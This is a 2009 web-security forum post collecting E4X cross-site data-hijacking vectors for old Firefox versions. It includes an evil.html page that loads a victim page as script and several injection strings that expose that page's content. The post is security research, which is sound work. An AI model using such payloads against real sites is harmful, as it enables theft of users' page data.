Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
E4X discussion/code/vectors (rev 2)
Posted by: Anonymous User
Date: July 12, 2009 01:04PM

Hi all,

I was thinking it would make sense to start a separate E4X thread. I had some spare time this afternoon and spent some time googling and playing around. Knowing at least Gareth, SDC and thornmaker have done research in this area I think there's more to add to this topic.

//Information Disclosure
Quote

good.html

<html>
<head>
<title>E4X</title>
</head>
<body></body>
</html>

Quote

evil.html

<html>
<head></head>
<body>
<script src=good.html></script>
</body>
</html>


//Injection points in good.html
Quote

// a= -> alert(a) in evil.html
a=<html>
<head></head>
</html>


// "/>;a=<tag foo=" -> alert(a) in evil.html
<html foo=""/>;a=<html foo="">
<head></head>
</html>


// </tag>;a=<tag> -> alert(a) in evil.html
<html></html>;a=<html>
<head></head>
</html>


// <{alert( ... )}> -> multi-point injection
<html>
<body>
<{alert(<b>secret</b>)}/>
</body>
</html>


// <![[CDATA[ ... ]]> -> multi-line attribute injection
<html a="<![CDATA[foo
<head>
<title>E4X</title>
</head>]]>">
<body>secret</body>
</html>.body


// .toXMLString().match(/.*/m),alert(RegExp.input) -> automatically alerts
<html>
<body>text</body>
</html>.toXMLString().match(/.*/m),alert(RegExp.input)
-->


//Additional links

//Good to know
Quote

Only FF1.5 - 3.x support E4X right now
Quote

E4X doesn't like DOCTYPEs, ELEMENT, ATTLIST... for now
Quote

E4X doesn't like invalid markup
Quote

var o = <b><p>x</p></b>; o.watch("p", function () {alert(1)});o.p=1 // apparently watch() has no impact on E4X object properties
Quote

NoScript: Potential cross-site E4X hijacking detected and blocked // switch off NoScript for better testing



Edited 3 time(s). Last edit at 07/13/2009 04:19PM by .mario.

Options: ReplyQuote


Sorry, only registered users may post in this forum.